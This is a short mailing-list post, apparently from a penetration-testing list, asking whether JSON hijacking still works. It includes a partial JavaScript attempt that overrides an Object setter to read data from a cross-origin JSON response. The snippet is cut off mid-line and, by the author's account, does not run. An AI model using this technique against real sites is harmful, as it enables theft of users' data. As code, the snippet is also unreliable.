Do you guys know if JSON Hijacking is still possible?
It seems the method __defineSetter__ has been deprecated but I've
seeing some post that it's still possible to override the constructor.
I tried using the javascript below but no error on console either a alert popup.
<script>
Object.defineProperty(Object.
set:function(obj) {
for(var i in obj) {
alert(i + '=' + obj[i]);
}
}
});
</script>
<script src="https://blah.returning.
Thanks!
Ricardo Iramar
------------------------------
This list is sponsored by: Information Assurance Certification Review Board
Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------
Komentarų nėra:
Rašyti komentarą